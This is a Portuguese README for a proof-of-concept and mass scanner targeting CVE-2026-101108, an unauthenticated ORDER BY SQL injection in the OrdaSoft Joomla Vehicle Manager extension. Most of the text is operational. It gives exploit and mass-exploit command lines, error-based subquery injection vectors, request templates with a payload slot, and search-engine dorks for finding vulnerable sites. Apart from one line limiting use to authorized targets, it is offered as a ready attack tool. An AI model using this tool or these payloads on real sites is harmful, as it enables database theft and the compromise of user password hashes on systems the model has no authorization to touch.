
PoC em Python 3 e scanner em massa para CVE-2026-101108, uma injeção SQL ORDER BY não autenticada no OrdaSoft Joomla Vehicle Manager <=6.5.7 (com_vehiclemanager).
PoC em Python 3 para CVE-2026-101108 — extensão Joomla OrdaSoft Vehicle Manager (Free) ≤ 6.5.7. Corrigido em 6.5.8+.
| PoCbit | https://pocbit.org/pocs/cve-2026-101108 |
| Catálogo | https://pocbit.org/pocs/ |
| Componente | com_vehiclemanager |
| Arquivo | site/vehiclemanager.php |
| Parâmetros | order_field, order_direction → ORDER BY (sem aspas) |
| Autenticação | Nenhuma (visualizações públicas de categoria / busca / todos os veículos) |
| CWE | CWE-89 Injeção SQL |
| CVSS 4.0 | 9.3 Crítico (Joomla CNA) |
Vehicle Manager (Free) é uma extensão da OrdaSoft que oferece anúncios de veículos no Joomla (categoria, busca, todos os veículos). Nas versões 6.5.7 e anteriores, os parâmetros de ordenação order_field e order_direction são processados em site/vehiclemanager.php: a entrada recebe escaping, mas como o valor é colocado em uma expressão ORDER BY sem aspas, o escaping é ineficaz contra SQLi (descrição do CNA).
Sem autenticação, o atacante pode ler/escrever no banco de dados, comprometendo hashes de usuários do Joomla e a integridade do site. Atualize para 6.5.8 ou superior.
Código típico em Joomla/PHP pode passar a entrada do usuário por um "sanitizador" que escapa aspas para literais de string. Em ORDER BY, nomes de colunas e expressões não são literais de string — a chave de ordenação é concatenada como estrutura SQL. Um atacante fornece expressões como subconsultas baseadas em erro em vez de um nome de coluna real. O texto do CNA para CVE-2026-101108 documenta explicitamente esse padrão de bypass de escaping.
Pontos de entrada anônimos no frontend afetados:
showCategory)search / tarefas relacionadas)showVehicles e similares)| Modo | Comportamento |
|---|---|
| check | Fingerprint do componente + versão do manifest, descobre catid/Itemid, confirma SQLi |
| exploit | Dupla consulta baseada em erro estilo EXTRACTVALUE via ORDER BY |
| mass | --list + -j para verificação em massa ou extração em massa |
Vetores de injeção testados (o primeiro bem-sucedido vence no exploit):
order_field GETorder_direction GET (asc,<subquery>)order_field POSTorder_direction POSTCampos JSONL: pocbit, pocbit_catalog, pocbit_page, cve, component.
cd CVE-2026-101108
pip install -r requirements.txt
python poc.py -u https://target.example --mode check
python poc.py -u https://target.example --mode check --aggressive
python poc.py -u https://target.example --mode exploit
python poc.py -u https://target.example --mode exploit --subquery "SELECT user()"
python poc.py -u https://target.example --mode exploit --vector order_direction_get
python poc.py --list targets.example.txt --mode check -j 40 --vuln-list hits.txt
python poc.py --list hits.txt --mode exploit -j 15 --subquery "SELECT VERSION()" --exploited-list exploited.txt
| Flag | Significado |
|---|---|
--aggressive | O modo check também tenta vazar SELECT VERSION() |
--subquery | SELECT interno para payload baseado em erro (MySQL) |
--vector | Força um dos quatro vetores ORDER BY |
--exploited-list | Vazamentos separados por tabulação em exploit bem-sucedido |
--no-color | CLI simples (NO_COLOR respeitado) |
Códigos de saída: modo exploit 0 quando exploited: true; modo check 0 quando exploitable_candidate.
Rota de categoria (parâmetros de ordenação anexados pelo PoC):
GET /index.php?option=com_vehiclemanager&task=showCategory&catid=1&order_field=<payload>&order_direction=asc HTTP/1.1
Linha de base da rota de busca construída pelo PoC:
GET /index.php?option=com_vehiclemanager&task=search&submit=Search&catid=0&maker=&fuel_type=all&model=all&listing_type=all&transmission=all HTTP/1.1
Quando legível:
/administrator/components/com_vehiclemanager/vehiclemanager.xmlVersão ≤ 6.5.7 → likely_vulnerable_version. ≥ 6.5.8 → patched_version.
body="option=com_vehiclemanager"
body="/components/com_vehiclemanager/" && body="Joomla"
title="Vehicle" && body="com_vehiclemanager"
body="ordasoft" && body="vehiclemanager"
Exporte hosts para targets.txt (uma URL base por linha), depois check → hits → exploit apenas em ativos autorizados.
Mesma janela de divulgação dos CVEs do Real Estate Manager (ex.: CVE-2026-100752 / CVE-2026-100753): várias extensões Joomla da OrdaSoft receberam correções de SQLi/XSS. Se você usa o Vehicle Manager, corrija todos os componentes OrdaSoft que você implanta.
| CVE | Produto | Problema | Corrigido |
|---|---|---|---|
| CVE-2026-101108 | Vehicle Manager (Free) | SQLi não autenticada em ORDER BY | 6.5.8 |
| CVE-2026-100752 | Real Estate Manager | SQLi não autenticada em ORDER BY | 6.7.9 |
Crédito (CNA): Ala Arfaoui.
com_vehiclemanager (versões mais antigas, parâmetros de busca) — distinta, mas relacionada à superfície do componenteApenas testes de segurança autorizados e validação de patches.
CVE-2026-101108 PoC: OrdaSoft Joomla Vehicle Manager (Free) <=6.5.7 unauth SQLi — order_field/order_direction unquoted ORDER BY (com_vehiclemanager). Colored check + mass exploit, CVSS 9.3. https://pocbit.org/pocs/cve-2026-101108